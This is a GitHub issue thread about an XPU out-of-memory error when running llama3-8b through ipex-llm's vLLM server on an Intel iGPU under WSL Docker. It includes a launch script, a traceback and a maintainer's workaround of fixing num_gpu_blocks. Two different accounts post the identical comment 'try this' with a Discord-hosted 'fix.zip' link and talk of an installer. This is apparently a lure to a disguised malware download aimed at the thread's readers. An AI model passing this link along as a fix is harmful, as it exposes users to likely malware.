### ISSUE TITLE
llama3-8b gets OOM on MTL iGPU WSL docker vllm

### ISSUE THREAD

**Issue by violet17** [intel-analytics/ipex-llm#11996]
llama3-8b gets OOM on MTL iGPU WSL docker vllm.
RAM:17GB   vRAM：9GB

commad:
```
#!/bin/bash
model="./models/"
served_model_name="llama3-8b"
 
source /opt/intel/1ccl-wks/setvars.sh
 
python -m ipex_llm.vllm.xpu.entrypoints.openai.api_server \
  --served-model-name $served_model_name \
  --port 8000 \
  --model $model \
  --trust-remote-code \
  --gpu-memory-utilization 0.9 \
  --device xpu \
  --dtype float16 \
  --enforce-eager \
  --load-in-low-bit sym_int4 \
  --max-model-len 512 \
  --max-num-batched-tokens 1000 \
  --max-num-seqs 12 \
  --tensor-parallel-size 1
```

log:

```
Special tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.
INFO 09-02 16:43:31 attention.py:71] flash_attn is not found. Using xformers backend.
2024-09-02 16:44:34,970 - INFO - Converting the current model to sym_int4 format......
2024-09-02 16:44:34,998 - INFO - Only HuggingFace Transformers models are currently supported for further optimizations
[2024-09-02 16:44:36,387] [INFO] [real_accelerator.py:203:get_accelerator] Setting ds_accelerator to xpu (auto detect)
2024-09-02 16:45:17,723 - INFO - Only HuggingFace Transformers models are currently supported for further optimizations
INFO 09-02 16:46:19 model_convert.py:257] Loading model weights took 4.7184 GB
INFO 09-02 16:49:14 gpu_executor.py:100] # GPU blocks: 2440, # CPU blocks: 2048
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "/usr/local/lib/python3.11/dist-packages/ipex_llm/vllm/xpu/entrypoints/openai/api_server.py", line 267, in <module>
    engine = IPEXLLMAsyncLLMEngine.from_engine_args(engine_args,
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ipex_llm/vllm/xpu/engine/engine.py", line 57, in from_engine_args
    engine = cls(parallel_config.worker_use_ray,
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ipex_llm/vllm/xpu/engine/engine.py", line 30, in __init__
    super().__init__(*args, **kwargs)
  File "/llm/vllm/vllm/engine/async_llm_engine.py", line 309, in __init__
    self.engine = self._init_engine(*args, **kwargs)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/llm/vllm/vllm/engine/async_llm_engine.py", line 409, in _init_engine
    return engine_class(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/llm/vllm/vllm/engine/llm_engine.py", line 106, in __init__
    self.model_executor = executor_class(model_config, cache_config,
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/llm/vllm/vllm/executor/gpu_executor.py", line 46, in __init__
    self._init_cache()
  File "/llm/vllm/vllm/executor/gpu_executor.py", line 110, in _init_cache
    self.driver_worker.init_cache_engine(cache_config=self.cache_config)
  File "/llm/vllm/vllm/worker/worker.py", line 162, in init_cache_engine
    self.cache_engine = CacheEngine(self.cache_config, self.model_config,
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/llm/vllm/vllm/worker/cache_engine.py", line 55, in __init__
    self.gpu_cache = self.allocate_gpu_cache()
                     ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/llm/vllm/vllm/worker/cache_engine.py", line 84, in allocate_gpu_cache
    key_blocks = torch.empty(
                 ^^^^^^^^^^^^
RuntimeError: XPU out of memory. Tried to allocate 78.00 MiB (GPU 0; 12.65 GiB total capacity; 6.21 GiB already allocated; 6.33 GiB reserved in total by PyTorch)
```

version:
ipexl-llm 0828

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by hzjane** [comment]
I think this issue will only encounter on windows mtl. Because vllm will first calculate how many `gpu_blocks` can be allocated for the current `gpu_rate` before applying. This error occurs when vllm applies memory for gpu_blocks. I suspect that some of the  memory requested by vllm is occupied by the Windows system display. Therefore, explicitly setting gpu_blocks is a way to prevent OOM errors.
```bash
vim /llm/vllm/vllm/worker/cache_engine.py  line 42
# set gpu_blocks to a fixed smaller value
self.num_gpu_blocks = 256
```

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by violet17** [comment]
Solved. Thanks.
